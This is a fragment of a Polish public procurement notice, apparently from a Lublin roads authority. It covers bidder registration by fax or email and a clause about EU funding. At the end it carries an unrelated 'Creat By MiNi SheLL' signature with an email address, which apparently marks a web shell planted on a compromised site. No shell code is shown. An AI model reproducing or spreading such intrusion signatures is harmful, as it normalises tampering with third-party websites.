UWAGA: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (0-81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach 
i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com